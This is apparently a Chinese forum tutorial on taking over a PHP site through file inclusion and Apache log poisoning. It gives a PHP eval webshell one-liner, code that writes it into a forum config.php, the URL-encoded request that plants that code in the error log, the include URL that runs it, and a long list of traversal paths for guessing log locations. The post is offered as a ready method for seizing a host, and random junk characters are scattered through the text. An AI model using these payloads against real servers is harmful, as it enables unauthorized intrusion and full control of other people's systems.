php包含apache日志写马

admin

因为上面那个很不实际，我在测试中发现日志动不动就是几十兆，那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用，也比上面那种慢的要死好很多。
! U, G$ b1 |: a- A
' K+ @' v; ~: J& [9 m% g比如还是这句一句话木马
<?eval($_POST[cmd]);?>   

# e! N* Y. s( I, K' F7 h% i7 l到这里你也许就想到了，这是个很不错的办法。接着看,如何写入就成了个问题，用这句，
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件，然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
! a8 F3 X" O% ~2 D
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
1 i  ^: I  m. O* n# ~- P& Kfclose($fp);?>   //在config.php里写入一句木马语句
% o/ [* X% m  p; u. k/ r) ?) o: Z
5 n7 U' I$ d/ j% K) J, E我们提交这句，再让Apache记录到错误日志里，再包含就成功写入shell,记得一定要转换成URL格式才成功。
转换为
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
5 E9 m+ t+ J$ ?; C: J' `config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
0 |; e1 [( _2 v4 k1 u7 Nfclose%28%24fp%29%3B%3F%3E
( Y+ T- y) z; w* O( w& ^& t2 l. g我们提交
( E1 }& |7 l$ K, ^http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
* c( e0 Q! ]1 `8 ]0 H%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
0 H* A3 o6 R+ U& v
2 `* [; s. w. v3 [0 B( z& F( h7 J* T这样就错误日志里就记录下了这行写入webshell的代码。
0 Q* b- e$ X; i5 Z) G+ a我们再来包含日志，提交
; [$ f* B" H, o2 C6 f7 hhttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

这样webshell就写入成功了，config.php里就写入一句木马语句
& @' l& [) b; @" XOK.
" \* E' P* [; q; M2 Phttp://www.xxx.com/forum/config.php这个就成了我们的webshell
1 I, S8 [  `4 I直接用lanker的客户端一连，主机就是你的了。

PS:上面讲的，前提是文件夹权限必须可写 ，一定要-rwxrwxrwx(777)才能继续，这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
: P8 n  L7 q+ f: S7 a1 A$ F( A/ d
其他的日志路径，你可以去猜，也可以参照这里。
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
) x+ {, \: f/ k' e* q( `+ d6 J( V3 e* P../apache/logs/access.log
! M, o: F& h2 E2 x../../apache/logs/error.log
../../apache/logs/access.log
2 a) R: `" R; R' i9 r../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
4 B5 v! M$ R; h. _& C! T8 ^../../../../../../../../../../etc/httpd/logs/acces.log
5 O! |- O" Y( T$ k6 {' O../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
$ |) w7 G8 b9 v8 W! E" K../../../../../../../../../../var/www/logs/access_log
7 {5 u  G  s# K4 n1 [9 H../../../../../../../../../../var/www/logs/access.log
2 {7 J9 a+ r% w/ i( @/ u../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
6 _% M, Y$ @0 X../../../../../../../../../../var/log/apache/access.log
& R/ H7 h* O' M6 e) A' U) H../../../../../../../../../../var/log/access_log
/ p' z' @0 _$ w../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
6 X, p: S) X2 A5 L; }6 d6 M/ h../../../../../../../../../../usr/local/apache/logs/error_log
5 n1 R5 [8 J- }$ `# h1 [../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
5 E0 p7 R7 e( S/ d( j$ w! ~../../../../../../../../../../var/log/apache/error.log
, w( J+ \( T( C& d$ x../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
" J# F& A! k6 o% j: i) A* q- S3 T/ i2 Q/var/log/httpd/access_log      
/var/log/httpd/error_log     
8 N( b6 S* z5 _../apache/logs/error.log     
2 l. R$ L( m; u' c0 c../apache/logs/access.log
" D! V9 i4 b% F../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
) G) e5 m1 d3 a2 T9 H; B../../../apache/logs/access.log
  `# g* e5 L( N5 }" J: i1 H9 t8 K/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
7 ]" Q9 B1 J$ b7 m/etc/httpd/logs/error.log
/var/www/logs/access_log
, \& l# _, l! i, \/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
& h% y  |+ G7 i+ e- j. W# [! c$ ]/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
3 m/ Z- l1 k4 ?# K. ~' ~/var/log/error_log